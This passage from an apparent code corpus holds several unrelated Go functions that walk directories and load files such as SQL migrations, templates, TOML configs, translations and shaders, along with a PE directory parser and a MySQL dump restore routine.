/path/to/M023_MyMigration.sql\", name)\n\t\t}\n\n\t\tid, err := strconv.ParseInt(fields[\"id\"], 10, 64)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"Invalid migration id '%s' for '%s'\", fields[\"id\"], name)\n\t\t}\n\n\t\tif m, exists := mm[id]; exists {\n\t\t\treturn nil, errors.Errorf(\"Duplicate migration ids: '%s' and '%s' have the same id\", m.Name, fields[\"name\"])\n\t\t}\n\n\t\tcontents, err := m.loadScript(name)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"Error loading script '%s'\", name)\n\t\t}\n\n\t\tmm[id] = &Migration{\n\t\t\tId: id,\n\t\t\tType: fields[\"type\"],\n\t\t\tName: fields[\"name\"],\n\t\t\tScript: string(contents),\n\t\t}\n\t}\n\tresult := getSortedMigrations(mm)\n\treturn result, nil\n}", "func FindTemplates(root, base string) (map[string]TemplateLoader, error) {\n\ttemplates := make(map[string]TemplateLoader)\n\trootBase := filepath.Join(root, base)\n\terr := filepath.Walk(rootBase, func(path string, fi os.FileInfo, err error) error {\n\t\tif fi.IsDir() {\n\t\t\treturn nil\n\t\t}\n\n\t\text := filepath.Ext(path)\n\t\tif ext != \".tpl\" {\n\t\t\treturn nil\n\t\t}\n\n\t\trelative, err := filepath.Rel(root, path)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"could not find relative path to base root: %s\", rootBase)\n\t\t}\n\n\t\trelative = strings.TrimLeft(relative, string(os.PathSeparator))\n\t\ttemplates[relative] = FileLoader(path)\n\t\treturn nil\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn templates, nil\n}", "func (f *FileStore) Load(collection string) ([]string, error) {\n\titems := []string{}\n\tbase := filepath.Join(f.Base, collection)\n\tbase, err := filepath.Abs(base)\n\tif err != nil {\n\t\tlog.Println(\"Error getting abs path to\", collection, err)\n\t\treturn nil, err\n\t}\n\tlog.Println(\"Loading collection\", collection, \"from\", base)\n\tfilepath.Walk(base, func(path string, info os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\t// Ignore\n\t\t\tlog.Println(\"store ignoring walk error\", err)\n\t\t\treturn filepath.SkipDir\n\t\t}\n\t\t/*\n\t\t\tif info.IsDir() {\n\t\t\t\tlog.Println(\"skipping dir\", path)\n\t\t\t\treturn filepath.SkipDir\n\t\t\t}\n\t\t*/\n\t\tif filepath.Ext(path) == \".txt\" {\n\t\t\tlog.Println(\"loading item\", path)\n\t\t\ttext, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\titems = append(items, string(text))\n\t\t} else {\n\t\t\tlog.Println(\"skipping non item\", path, filepath.Ext(path))\n\t\t}\n\t\treturn nil\n\t})\n\treturn items, nil\n\n}", "func loadDocuments(paths []string) (map[string]string, error) {\n\tignoreFileExtensions := func(abspath string, info os.FileInfo, depth int) bool {\n\t\treturn !contains([]string{\".yaml\", \".yml\", \".json\"}, filepath.Ext(info.Name()))\n\t}\n\n\tdocumentPaths, err := loader.FilteredPaths(paths, ignoreFileExtensions)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"filter data paths: %w\", err)\n\t}\n\n\tdocuments := make(map[string]string)\n\tfor _, documentPath := range documentPaths {\n\t\tcontents, err := ioutil.ReadFile(documentPath)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"read file: %w\", err)\n\t\t}\n\n\t\tdocuments[documentPath] = string(contents)\n\t}\n\n\treturn documents, nil\n}", "func FindFiles(path string) map[string][]string {\n\tfiles := make(map[string][]string)\n\tcol := CollectionName(nil, path+\"/documents\")\n\tDirWalk(col, path+\"/documents\", files)\n\treturn files\n}", "func (g *Groker) Map() error {\n\n\tfiles, err := g.Arguments.grokfiles()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn err\n\t}\n\n\tfor _, filename := range files {\n\t\tfh, err := ioutil.ReadFile(filename)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\tcontinue\n\t\t}\n\n\t\tsplitFh := bytes.Split(fh, []byte{'\\n'})\n\n\t\tfor _, line := range splitFh {\n\t\t\trgroups := g.FileloadingPattern.FindStringSubmatch(string(line))\n\n\t\t\tif len(rgroups) > 0 {\n\t\t\t\tg.LookupDict[rgroups[grokNameIndex]] = rgroups[grokValueIndex]\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func Load(globPattern string) error {\n paths, err := filepath.Glob(globPattern)\n if err != nil {\n return nil\n }\n\n for _, filePath := range paths {\n err := loadFile(filePath)\n if err != nil {\n return err\n }\n }\n\n return nil\n}", "func FindConfigs(baseDir string) ([]Config, error) {\n\tdir, err := os.Open(baseDir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfinfo, err := dir.Stat()\n\tif !finfo.IsDir() {\n\t\treturn nil, fmt.Errorf(\"`%s' is not a directory\", baseDir)\n\t}\n\n\tfinfos, err := dir.Readdir(0)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to list files from `%s'\", baseDir)\n\t}\n\n\tvar configurations = make([]Config, 0)\n\n\tfor _, fi := range finfos {\n\t\t// only fetch files\n\t\tif !fi.IsDir() {\n\t\t\tif strings.HasSuffix(fi.Name(), \"_hmon.toml\") {\n\t\t\t\tfullFile := path.Join(baseDir, fi.Name())\n\n\t\t\t\tc := Config{}\n\t\t\t\tc.FileName = fi.Name()\n\n\t\t\t\t_, err := toml.DecodeFile(fullFile, &c)\n\t\t\t\tif err != nil {\n\t\t\t\t\t// when one or more config files can't be\n\t\t\t\t\t// parsed, bail out!\n\t\t\t\t\treturn nil, fmt.Errorf(\"failed to parse file `%s': %s\", fullFile, err)\n\t\t\t\t}\n\n\t\t\t\t// else we can just add it to the parsed configurations\n\t\t\t\t// slice and continue.\n\t\t\t\tconfigurations = append(configurations, c)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn configurations, nil\n}", "func (self *PEFile) GetDirectories() *ordereddict.Dict {\n\tresult := ordereddict.NewDict()\n\n\tfor _, i := range []struct {\n\t\tidx int64\n\t\tname string\n\t}{\n\t\t{IMAGE_DIRECTORY_ENTRY_ARCHITECTURE, \"Architecture_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_BASERELOC, \"Base_Relocation_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT, \"Bound_Import_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, \"DotNet_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_DEBUG, \"Debug_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, \"Delay_Imports_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_EXCEPTION, \"Exception_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_EXPORT, \"Export_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_GLOBALPTR, \"Global_Ptr_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_IAT, \"IAT_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_IMPORT, \"Import_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, \"Load_Config_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_RESOURCE, \"Resource_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_SECURITY, \"Security_Directory\"},\n\t\t{IMAGE_DIRECTORY_ENTRY_TLS, \"TLS_Directory\"},\n\t} {\n\t\tdir := self.nt_header.DataDirectory(i.idx)\n\t\tif dir.DirSize() > 0 {\n\t\t\tfile_address := dir.VirtualAddress()\n\t\t\tvar section_name string\n\n\t\t\tsection := findSection(self.Sections, int64(file_address))\n\t\t\tif section != nil {\n\t\t\t\tsection_name = section.Name\n\t\t\t}\n\n\t\t\tgen_dir := self.nt_header.Profile.GENERIC_DIRECTORY(\n\t\t\t\tself.nt_header.Reader, int64(dir.VirtualAddress()))\n\t\t\tresult.Set(i.name, Directory{\n\t\t\t\tSize: dir.DirSize(),\n\t\t\t\t// This is really a file address\n\t\t\t\tFileAddress: file_address,\n\t\t\t\tTimestamp: gen_dir.TimeDateStamp().Time,\n\t\t\t\tTimestampRaw: gen_dir.TimeDateStamp().Raw,\n\t\t\t\tSectionName: section_name,\n\t\t\t})\n\t\t}\n\t}\n\n\treturn result\n}", "func MysqlLoad(file, dbname string) {\n\tdb, err := sql.Open(\"mysql\", dsn)\n\tif err != nil {\n\t\tfmt.Errorf(\"Fail to connect database. %s\", err.Error())\n\t}\n\tdefer db.Close()\n\tdb.Ping()\n\n\t_, err = db.Exec(\"USE \" + dbname)\n\tif err != nil {\n\t\tfmt.Printf(\"[db.EXEC] switch databases %s -> %s : \\n\", dbname, err.Error())\n\t\treturn\n\t}\n\n\tcontent, err := ioutil.ReadFile(file)\n\tif err != nil {\n\t\tfmt.Errorf(\"readfile error\")\n\t}\n\n\tdefer func() {\n\t\tif err := recover(); err != nil {\n\t\t\tfmt.Println(\"[EXEC RECOVER] error \", err)\n\t\t}\n\t}()\n\n\tqueries := strings.Split(string(content), \";\")\n\t// fmt.Println(queries)\n\tfor _, query := range queries {\n\t\tif strings.TrimSpace(query) != \"\" {\n\n\t\t\t// fmt.Println(query)\n\t\t\t_, err := db.Exec(query)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Errorf(\"[db.EXEC] %s -> %s : \", query, err.Error())\n\t\t\t}\n\t\t\t// a, _ := res.RowsAffected()\n\t\t\t// fmt.Println(a)\n\t\t}\n\t}\n\tfmt.Println(\"import \", file, \" finish !\")\n}", "func LoadPatterns(path string) error {\n\treturn filepath.Walk(path, walkPatternDir)\n}", "func collectDataPaths(target string) ([]string, error) {\n\tcontents, err := ioutil.ReadFile(target)\n\tif err != nil {\n\t\treturn []string{}, fmt.Errorf(\"Failure to read file '%s'. Err: %s\", string(contents), err)\n\t}\n\n\tif strings.Contains(string(contents), \"* data_path: \") {\n\t\tfile, err := os.Open(target)\n\t\tdefer file.Close()\n\t\tif err != nil {\n\t\t\treturn []string{}, fmt.Errorf(\"Failure to read file '%s'. Err: %s\", string(contents), err)\n\t\t}\n\n\t\tdataPathsMap := map[string]string{}\n\t\tscanner := bufio.NewScanner(file)\n\t\tfor scanner.Scan() {\n\t\t\tif strings.Contains(scanner.Text(), \"* data_path: \") {\n\t\t\t\ts := strings.Replace(scanner.Text(), \"* data_path: \", \"\", 1)\n\t\t\t\tdataPathsMap[s] = s\n\t\t\t}\n\t\t}\n\t\tret := []string{}\n\t\tfor k := range dataPathsMap {\n\t\t\tret = append(ret, k)\n\t\t}\n\n\t\treturn ret, nil\n\t}\n\n\treturn []string{}, nil\n}", "func Loader(args *Args) {\n\tpool, err := NewPool(args.Threads, args.Address, args.User, args.Password, args.SessionVars)\n\tif err != nil {\n\t\tklog.Fatalf(\"Make Mysql Connection Pool Failed: %v\", err)\n\t}\n\n\tdefer pool.Close()\n\n\tvar reader storage.StorageReadWriter\n\tif args.Local != nil {\n\t\treader, err = storage.NewLocalReadWriter(args.Local.Outdir)\n\t\tif err != nil {\n\t\t\tklog.Fatalf(\"Create LocalReadWriter Failed: %v\", err)\n\t\t}\n\t} else if args.S3 != nil {\n\t\treader, err = storage.NewS3ReadWriter(args.S3.S3Endpoint,\n\t\t\targs.S3.S3Region,\n\t\t\targs.S3.S3Bucket,\n\t\t\targs.S3.S3AccessKey,\n\t\t\targs.S3.S3SecretAccessKey,\n\t\t\targs.S3.BackupDir)\n\n\t\tif err != nil {\n\t\t\tklog.Fatalf(\"Create S3ReadWriter Failed: %v\", err)\n\t\t}\n\t} else {\n\t\tlog.Fatalf(\"Invalid Reader\")\n\t}\n\n\tfiles := reader.LoadFiles(args.Outdir)\n\n\tif files == nil {\n\t\tlog.Fatalf(\"Cannot fetch any files\")\n\t}\n\t// database.\n\tconn := pool.Get()\n\terr = restoreDatabaseSchema(files.Databases, conn, reader)\n\tif err != nil {\n\t\tklog.Fatalf(\"Restore Database Schema Failed: %v\", err)\n\t}\n\tpool.Put(conn)\n\n\t// tables.\n\tconn = pool.Get()\n\terr = restoreTableSchema(args.OverwriteTables, files.Schemas, conn, reader)\n\tif err != nil {\n\t\tklog.Fatalf(\"Restore Table Schema Failed: %v\", err)\n\t}\n\tpool.Put(conn)\n\n\t// Shuffle the tables\n\tfor i := range files.Tables {\n\t\tj := rand.Intn(i + 1)\n\t\tfiles.Tables[i], files.Tables[j] = files.Tables[j], files.Tables[i]\n\t}\n\n\tvar wg sync.WaitGroup\n\tvar bytes uint64\n\tt := time.Now()\n\tfor _, table := range files.Tables {\n\t\tconn := pool.Get()\n\t\twg.Add(1)\n\t\tgo func(conn *Connection, table string) {\n\t\t\tdefer func() {\n\t\t\t\twg.Done()\n\t\t\t\tpool.Put(conn)\n\t\t\t}()\n\t\t\tr , err := restoreTable(table, conn, reader)\n\t\t\tif err != nil {\n\t\t\t\tklog.Fatalf(\"Restore Table Failed: %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&bytes, uint64(r))\n\t\t}(conn, table)\n\t}\n\n\ttick := time.NewTicker(time.Millisecond * time.Duration(args.IntervalMs))\n\tdefer tick.Stop()\n\tgo func() {\n\t\tfor range tick.C {\n\t\t\tdiff := time.Since(t).Seconds()\n\t\t\tbytes := float64(atomic.LoadUint64(&bytes) / 1024 / 1024)\n\t\t\trates := bytes / diff\n\t\t\tklog.Info(\"restoring.allbytes[%vMB].time[%.2fsec].rates[%.2fMB/sec]...\", bytes, diff, rates)\n\t\t}\n\t}()\n\n\twg.Wait()\n\telapsed := time.Since(t).Seconds()\n\tklog.Info(\"restoring.all.done.cost[%.2fsec].allbytes[%.2fMB].rate[%.2fMB/s]\", elapsed, float64(bytes/1024/1024), (float64(bytes/1024/1024) / elapsed))\n}", "func LoadFortuneMods(dir string) {\n\tfiles, _ := filepath.Glob(dir + \"/*\")\n\n\tfor _, f := range files {\n\t\tvar fortunes = loadFortuneMod(f)\n\t\tmod := strings.Split(f, \"/\")[1]\n\t\tlogger.Printf(\"Loaded %d fortunes from %s\", len(fortunes), mod)\n\n\t\taddToRedis(mod, fortunes)\n\t}\n}", "func ScanForSPARQLFiles(repositoryPath string) ([]string, error) {\n sparqlFiles := make([]string, 0)\n err := filepath.Walk(repositoryPath, func(path string, info os.FileInfo, err error) error {\n if err == nil {\n if !info.IsDir() {\n match := sparqlFileRegex.MatchString(path)\n if match {\n sparqlFiles = append(sparqlFiles, path)\n }\n }\n }\n return err\n })\n return sparqlFiles, err\n}", "func Migrations(dir string) Option {\n\treturn optionFn(func(f Fataler, data *optionData) {\n\t\terr := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif filepath.Ext(path) != \".sql\" || info.IsDir() {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tdata.schemaPaths = append(data.schemaPaths, path)\n\t\t\treturn nil\n\t\t})\n\t\tif err != nil {\n\t\t\tf.Fatal(err)\n\t\t}\n\t})\n}", "func loadShaderFilesFromDirectory(dir string) ([]string, []ShaderType, error) {\n\tvar (\n\t\tshaders []string\n\t\tshaderTypes []ShaderType\n\t)\n\tif err := filepath.Walk(dir, func(path string, f os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif strings.HasSuffix(f.Name(), shaderSuffix) {\n\t\t\tshader := strings.TrimSuffix(f.Name(), shaderSuffix)\n\t\t\tnodes := strings.Split(shader, \".\")\n\n\t\t\tif len(nodes) != 2 {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tsuffix := nodes[len(nodes)-1]\n\t\t\tswitch suffix {\n\t\t\tcase \"frag\":\n\t\t\t\tshaderTypes = append(shaderTypes, FragmentShaderType)\n\t\t\t\tshaders = append(shaders, path)\n\t\t\tcase \"vert\":\n\t\t\t\tshaderTypes = append(shaderTypes, VertexShaderType)\n\t\t\t\tshaders = append(shaders, path)\n\t\t\tdefault:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}); err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn shaders, shaderTypes, nil\n}", "func (s *server) loadTemplates() error {\n includePath := \"templates/\"\n layoutPath := \"templates/layout/\"\n\n if s.templates == nil {\n s.templates = make(map[string]*template.Template)\n }\n\n layoutFiles, err := filepath.Glob(layoutPath + \"*.tmpl\")\n if err != nil {\n log.Println(\"failed to get included templates\")\n return err\n }\n\n includeFiles, err := filepath.Glob(includePath + \"*.tmpl\")\n if err != nil {\n log.Println(\"failed to get layout templates\")\n return err\n }\n\n mainTemplate := template.New(\"main\")\n mainTemplate, err = mainTemplate.Parse(mainTmpl)\n if err != nil {\n log.Println(\"failed to parse main template\")\n return err\n }\n\n for _, file := range includeFiles {\n fileName := filepath.Base(file)\n files := append(layoutFiles, file)\n s.templates[fileName], err = mainTemplate.Clone()\n if err != nil {\n return err\n }\n s.templates[fileName] = template.Must(\n s.templates[fileName].ParseFiles(files...))\n }\n\n s.bufpool = bpool.NewBufferPool(64)\n return nil\n}", "func ScanDir(root string, dest string) ([]Result, error) {\n\t// MD5All closes the done channel when it returns; it may do so before\n\t// receiving all the values from c and errc.\n\tdone := make(chan struct{})\n\tdefer close(done)\n\n\tpaths, errc := walkFiles(done, root)\n\n\t// Start a fixed number of goroutines to read and digest files.\n\tc := make(chan Result) // HLc\n\tvar wg sync.WaitGroup\n\tconst numDigesters = 20\n\twg.Add(numDigesters)\n\tfor i := 0; i < numDigesters; i++ {\n\t\tgo func() {\n\t\t\tdigester(done, paths, dest, c) // HLc\n\t\t\twg.Done()\n\t\t}()\n\t}\n\tgo func() {\n\t\twg.Wait()\n\t\tclose(c) // HLc\n\t}()\n\t// End of pipeline. OMIT\n\n\tvar resultList []Result\n\tfor r := range c {\n\t\tresultList = append(resultList, r)\n\n\t\t// out, err := json.Marshal(r)\n\t\t// if err != nil {\n\t\t// \tpanic(err)\n\t\t// }\n\n\t\t//fmt.Println(string(out))\n\t}\n\n\t// Check whether the Walk failed.\n\tif err := <-errc; err != nil { // HLerrc\n\t\treturn nil, err\n\t}\n\treturn resultList, nil\n}", "func Scan(folder, pattern string) ([]string, error) {\n\tfiles, err := os.ReadDir(folder)\n\tif err != nil {\n\t\treturn []string{}, err\n\t}\n\n\tplugins := []string{}\n\tfor _, file := range files {\n\t\tif !file.IsDir() && strings.Contains(file.Name(), pattern) {\n\t\t\tplugins = append(plugins, filepath.Join(folder, file.Name()))\n\t\t}\n\t}\n\n\treturn plugins, nil\n}", "func (db *ldb) loadAll() {\n\tf, err := os.Open(game_data_file)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\trd := bufio.NewReader(f)\n\n\tvar l = 0\n\tvar matrix = make([]string, 0)\n\tfor {\n\t\tline, err := rd.ReadString('\\n')\n\t\tif err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\tdb.data = append(db.data, matrix)\n\t\t\t\tdb.maxLevel = len(db.data)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tpanic(err)\n\t\t}\n\t\tline = strings.TrimRight(line, \"\\t\\n\\f\\r\")\n\t\tif len(line) == 0 {\n\t\t\tdb.data = append(db.data, matrix)\n\t\t\tl = l + 1\n\t\t\tmatrix = make([]string, 0)\n\t\t} else {\n\t\t\tmatrix = append(matrix, line)\n\t\t}\n\t}\n}", "func parseTemplates() (){\n templates = make(map[string]*template.Template)\n if files, err := ioutil.ReadDir(CONFIG.TemplatesDir) ; err != nil {\n msg := \"Error reading templates directory: \" + err.Error()\n log.Fatal(msg)\n } else {\n for _, f := range files {\n fmt.Println(f.Name())\n err = nil\n\n tpl, tplErr := template.New(f.Name()).Funcs(template.FuncMap{\n \"humanDate\": humanDate,\n \"humanSize\": humanSize,}).ParseFiles(CONFIG.TemplatesDir + \"/\" + f.Name())\n if tplErr != nil {\n log.Fatal(\"Error parsing template: \" + tplErr.Error())\n } else {\n templates[f.Name()] = tpl\n }\n }\n }\n return\n}", "func (t *Repository) LoadDir(templatePath string) error {\n\terr := filepath.Walk(templatePath, func(path string, info os.FileInfo, err error) error {\n\n\t\tif strings.HasSuffix(path, \".gotmpl\") {\n\t\t\tif assetName, e := filepath.Rel(templatePath, path); e == nil {\n\t\t\t\tif data, e := ioutil.ReadFile(path); e == nil {\n\t\t\t\t\tif ee := t.AddFile(assetName, string(data)); ee != nil {\n\t\t\t\t\t\t// Fatality is decided by caller\n\t\t\t\t\t\t// log.Fatal(ee)\n\t\t\t\t\t\treturn fmt.Errorf(\"could not add template: %v\", ee)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t// Non-readable files are skipped\n\t\t\t}\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// Non-template files are skipped\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not complete template processing in directory \\\"%s\\\": %v\", templatePath, err)\n\t}\n\treturn nil\n}", "func getMapList() []string {\n\tfiles, err := dry.ListDirFiles(default_map_data_dir)\n\tif err != nil {\n\t\treturn []string{}\n\t} else {\n\t\tfmt.Println(files)\n\t\treturn dry.StringMap(func(s string) string {\n\t\t\treturn strings.Replace(s, path.Ext(s), \"\", 1)\n\t\t}, files)\n\t\t// return files\n\t}\n}", "func (db *DB) readDB() (map[string]string, error) {\n\tdata, err := ioutil.ReadFile(db.DBPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar mappings map[string]string\n\terr = yaml.Unmarshal(data, &mappings)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif len(mappings) == 0 {\n\t\tmappings = make(map[string]string)\n\t}\n\n\treturn mappings, nil\n}", "func loadIndexs() {\n\tdb := open()\n\tindexs = make(map[string][]*Index)\n\tdb.View(func(tx *bolt.Tx) error {\n\t\tb := tx.Bucket([]byte(INDEX_BUCKET))\n\t\tif b == nil {\n\t\t\tlogger.Infof(\"bucket[%s] not exist\", INDEX_BUCKET)\n\t\t\treturn nil\n\t\t}\n\t\tc := b.Cursor()\n\t\tfor k, v := c.First(); k != nil; k, v = c.Next() {\n\t\t\tkey := string(k)\n\t\t\tvar _indexs []string\n\t\t\terr := json.Unmarshal(v, &_indexs)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Errorf(\"parse index[%s] error -> %v\", k, err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t__indexs := make([]*Index, len(_indexs)) \n\t\t\t// parse index\n\t\t\tfor i, _index := range _indexs {\n\t\t\t\tsps :=strings.Split(_index, INDEX_SPLIT) \n\t\t\t\tindex := &Index {\n\t\t\t\t\tbucket: key,\n\t\t\t\t\tindexs: sps,\n\t\t\t\t}\n\t\t\t\t__indexs[i] = index\n\t\t\t}\n\t\t\tindexs[key] = __indexs\n\t\t}\n\t\treturn nil\n\t})\n}", "func walk_file(path string) Entries {\n\tfiles, err := ioutil.ReadDir(path)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tentries := Entries{}\n\tentries.path = path\n\n\tfor _, fi := range files {\n\t\tif strings.HasPrefix(fi.Name(), \".\") || contains(ignores, fi.Name()) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif fi.IsDir() {\n\t\t\tentries.entries = append(entries.entries, walk_file(filepath.Join(path, fi.Name())))\n\t\t} else {\n\t\t\tentries.contents = append(entries.contents, Content{title: fi.Name()})\n\n\t\t}\n\t}\n\n\treturn entries\n}", "func (fs *Mysqlfs) ReadDir(path string) ([]os.FileInfo, error) {\n\tf, err := fs.storage.GetFile(path)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif f != nil {\n\t\tif target, isLink := fs.resolveLink(path, f); isLink {\n\t\t\treturn fs.ReadDir(target)\n\t\t}\n\t}\n\n\tvar entries []os.FileInfo\n\tchildren, err := fs.storage.Children(path)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, f := range children {\n\t\tfi, _ := f.Stat()\n\t\tentries = append(entries, fi)\n\t}\n\n\treturn entries, nil\n}", "func loadTranslations(trPath string) error {\n\tfiles, _ := filepath.Glob(trPath + \"/*.json\")\n\n\tif len(files) == 0 {\n\t\treturn errors.New(\"no translations found\")\n\t}\n\n\tfor _, file := range files {\n\t\terr := loadFileToMap(file)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func scanDir(dir string) error {\n\n\tvar files []string\n\tvar m = make(map[string]int)\n\tm[\"directories\"] = 0\n\tm[\"others\"] = 0\n\tm[\"symlinks\"] = 0\n\n\tfmt.Printf(\"Path: %s\\n\", dir)\n\n filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n files = append(files, path)\n return nil\n\t})\n\t\n for _, file := range files {\n state, err := os.Lstat(file)\n\t\tif(err != nil){\n\t\t\tfmt.Println(err)\n\t\t}\n\n\t\tif state.Mode() & os.ModeSymlink != 0{\n\t\t\tm[\"symlinks\"] = m[\"symlinks\"] + 1\n\t\t}\n\n\t\tswitch mode := state.Mode(); {\n\n\t\tcase mode.IsDir():\n\t\t\tm[\"directories\"] = m[\"directories\"] + 1\n\n\t\tcase mode.IsRegular():\n\t\t\tm[\"others\"] = m[\"others\"] + 1\n\n\t\t}\n\t}\t\n\n\tfor key, value := range m{\n\t\tfmt.Println(key, \":\", value);\n\t}\n\n\treturn nil\n}", "func parseFiles(model *dms.Model) {\n\tvar (\n\t\tok bool\n\t\ttable string\n\t\ttableList []dms.Attrs\n\t\trefs []*dms.Reference\n\t)\n\n\t// Initialize\n\tschema := &dms.Schema{\n\t\tForeignKeys: make([]*dms.ForeignKey, 0),\n\t\tNotNullables: make([]*dms.NotNullable, 0),\n\t}\n\n\tmodel.Schema = schema\n\n\ttableFields := make(map[string][]dms.Attrs)\n\tfieldSchemata := make(TableFieldIndex)\n\n\t// Load all the definitions files.\n\tfilepath.Walk(model.Path, func(path string, info os.FileInfo, err error) error {\n\t\t// Ignore errors.\n\t\tif err != nil {\n\t\t\treturn nil\n\t\t}\n\n\t\t// Nothing to do with directories.\n\t\tif info.IsDir() {\n\t\t\treturn nil\n\t\t}\n\n\t\t// Skip non-CSV files.\n\t\tif filepath.Ext(path) != \".csv\" {\n\t\t\treturn nil\n\t\t}\n\n\t\tf, err := os.Open(path)\n\n\t\tif err != nil {\n\t\t\treturn nil\n\t\t}\n\n\t\tdefer f.Close()\n\n\t\tr := NewMapCSVReader(f)\n\n\t\tfileType := detectFileType(r.Fields())\n\n\t\tif fileType == UnknownType {\n\t\t\tlogrus.Warnf(\"parse (%s): could not detect file type\", path)\n\t\t\treturn nil\n\t\t}\n\n\t\t// Read all the records.\n\t\trecords, err := r.ReadAll()\n\n\t\tif err != nil || len(records) == 0 {\n\t\t\tlogrus.Warnf(\"parse (%s): error reading file\", path)\n\t\t\treturn nil\n\t\t}\n\n\t\tswitch fileType {\n\t\tcase TablesFile:\n\t\t\tlogrus.Debugf(\"parse (%s): adding tables file\", path)\n\t\t\ttableList = append(tableList, records...)\n\n\t\tcase FieldsFile:\n\t\t\tlogrus.Debugf(\"parse (%s): adding fields file\", path)\n\t\t\tvar tableRecords []dms.Attrs\n\n\t\t\tfor _, record := range records {\n\t\t\t\ttable = record[\"table\"]\n\n\t\t\t\tif tableRecords, ok = tableFields[table]; !ok {\n\t\t\t\t\ttableRecords = make([]dms.Attrs, 0)\n\t\t\t\t}\n\n\t\t\t\ttableRecords = append(tableRecords, record)\n\t\t\t\ttableFields[table] = tableRecords\n\t\t\t}\n\n\t\tcase SchemataFile:\n\t\t\tfor _, r := range records {\n\t\t\t\tfieldSchemata.Add(r[\"table\"], r[\"field\"], r)\n\t\t\t}\n\n\t\tcase ReferencesFile:\n\t\t\tfor _, r := range records {\n\t\t\t\trefs = append(refs, &dms.Reference{\n\t\t\t\t\tName: r[\"name\"],\n\t\t\t\t\tAttrs: r,\n\t\t\t\t})\n\n\t\t\t\tschema.AddForeignKey(r)\n\t\t\t}\n\n\t\tcase ConstraintsFile:\n\t\t\tfor _, r := range records {\n\t\t\t\tswitch r[\"type\"] {\n\t\t\t\tcase \"primary key\":\n\t\t\t\t\tschema.AddPrimaryKey(r)\n\n\t\t\t\tcase \"unique\":\n\t\t\t\t\tschema.AddUnique(r)\n\n\t\t\t\tcase \"not null\":\n\t\t\t\t\tschema.AddNotNullable(r)\n\t\t\t\t}\n\t\t\t}\n\n\t\tcase IndexesFile:\n\t\t\tfor _, r := range records {\n\t\t\t\tschema.AddIndex(r)\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t})\n\n\tvar (\n\t\tattrs dms.Attrs\n\t\tt *dms.Table\n\t\tf *dms.Field\n\t\tfields *dms.Fields\n\t\tfieldList []dms.Attrs\n\t)\n\n\t// Combine and link.\n\tmodel.Tables = new(dms.Tables)\n\n\t// Fields that has references to other fields.\n\tfor _, attrs = range tableList {\n\t\tfields = new(dms.Fields)\n\n\t\tt = &dms.Table{\n\t\t\tName: attrs[\"table\"],\n\t\t\tDescription: stripNewlines(attrs[\"description\"]),\n\t\t\tLabel: attrs[\"label\"],\n\t\t\tFields: fields,\n\t\t\tModel: model,\n\t\t\tAttrs: attrs,\n\t\t}\n\n\t\tmodel.Tables.Add(t)\n\n\t\tfieldList, ok = tableFields[t.Name]\n\n\t\tif !ok {\n\t\t\tcontinue\n\t\t}\n\n\t\tvar req bool\n\n\t\tfor _, attrs = range fieldList {\n\t\t\tswitch strings.ToLower(attrs[\"required\"]) {\n\t\t\tcase \"yes\", \"y\", \"1\":\n\t\t\t\treq = 